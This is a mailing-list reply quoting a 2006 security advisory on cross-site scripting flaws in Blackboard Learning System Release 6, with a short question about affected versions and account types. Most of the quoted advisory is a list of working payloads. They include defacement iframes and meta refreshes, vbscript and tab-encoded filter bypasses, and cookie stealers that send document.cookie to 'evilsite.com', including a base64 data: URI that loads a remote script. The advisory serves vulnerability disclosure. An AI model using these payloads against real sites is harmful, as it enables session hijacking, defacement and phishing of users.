What type of an account do you have to have and in what sections can this be exploited? Also, has Blackboard verified this in their current release (7.1)?
-cdh [EMAIL PROTECTED] wrote: > ----------------------------------------------------------------------------------------- > > > Found by: PrOtOn & digi7al64 > > > Date: May 20th 2006 > > > Critical Level: High > > > Type: Multiple Cross Site Scripting (XSS) vunerabilities > > > > ------------------------------------------------------------------------------------------ > > > > Software: > > Blackboard Learning System (Release 6) Blackboard Learning and Community > Portal Suite (Release6)-6.2.3.23 > > > > ------------------------------------------------------------------------------------------ > > > > Explanation: You can inject HTML, VB code and or Javascript into specific > tags to steal > > cookies, deface the site using frame busters or even redirect to external > sites for phishing purposes. > > If you have limited access, then a simple post into the Discussion Board > using the right > > tags with the right code (provided below) will execute the vulnerability(ies). > > > > ------------------------------------------------------------------------------------------- > > > About: > > Blackboards parsing system only checks for the string "javascript", Thus > vbscript code can be injected at will into tags as well as any versions of > javascript that uses uncommon syntax (ie tabs encoding etc) > > > ------------------------------------------------------------------------------------------- > > Vulnerabilities: > > > Defacement (FrameBuster) > > ------------------------- > > <meta http-equiv="refresh" > > content="15;url= http://evilsite.com";> > > > > Defacement (FrameBuster) > > ------------------------- > > <iframe src=" http://evilsite.com"; width=100 > > height=100></iframe> > > > > Defacement (IE ONLY) > > ------------------------- > > <img src=vbscript:document.write("defaced_by_insane_script_kiddies")> > > > > Defacement (IE ONLY) > > ------------------------- > > <link rel="stylesheet" > > href=vbscript:document.write("defaced_by_insane_script_kiddies")> > > > <img src=vb script:document.write("defaced_by_insane_script_kiddies")> > > > > Cookie Stealer (IE ONLY) > > ------------------------- > > > <img > > src="vbscript:wintest=window.open(%22http://evilsite.com + > document.cookie)"style=visibility:hidden/> > > <img src="vbscript:window.focus ()"style=visibility:hidden/> > > <img src="vbscript: window.close()"style=visibility:hidden/> > > > > Cookie Stealer (IE ONLY) > > ------------------------- > > <link rel="stylesheet" > > href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)"> > > > > Cookie Stealer (Encoded Tab - IE ONLY) > > ------------------------- > > <img > > src="jav	ascript: > document.images[1].src=%22http://evilsite.com+document.cookie;";<img src="jav > > ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> > > > > Cookie Stealer (html encoded - IE ONLY) > > ------------------------- > > <img > > src='javascripdocument.images[1].s > > rc=" http://evilsite.com"+document.cookie;'<img > > src="jav > > ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> > > > > Cookie Stealer (tabs - IE ONLY) > > ------------------------- > > <img src="jav > > ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> > > > > Cookie Stealer (body tag with tabs - IE ONLY) > > ------------------------- > > <body background="jav > > ascript:document.images[1].src=%22http://evilsite.com+document.cookie;";> > > > > Cookie Stealer (div tag with tabs - IE ONLY) > > ------------------------- > > <div style="background-image: url(jav > > ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"> > > > > Cookie Stealer (firefox) > > ------------------------- > > <META HTTP-EQUIV="refresh" > > CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4="> > > > > Cookie Stealer (firefox - click to work) > > ------------------------- > > <a > > href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a> > > > > > --------------------------------------------------------------------------------------------- > > > > Disclaimer: > > Myself or any other person involved with this discovery will not be > responsible for what you > > do with this information. > > Blackboard developers have been contacted by me and a patch has been released > according to them. > > > > ----------------------------------------------------------------------------------------------- > > > > Shout Outs: > > r0xes, criticalsecurity(dot)net, Infowar(dot)com > > > > ------------------------------------------------------------------------------------------------ > > > > Contact: > > Pr070n(at)gmail(dot)com > > Digi7al64(at)gmail(dot)com > > > > ------------------------------------------------------------------------------------------------- >
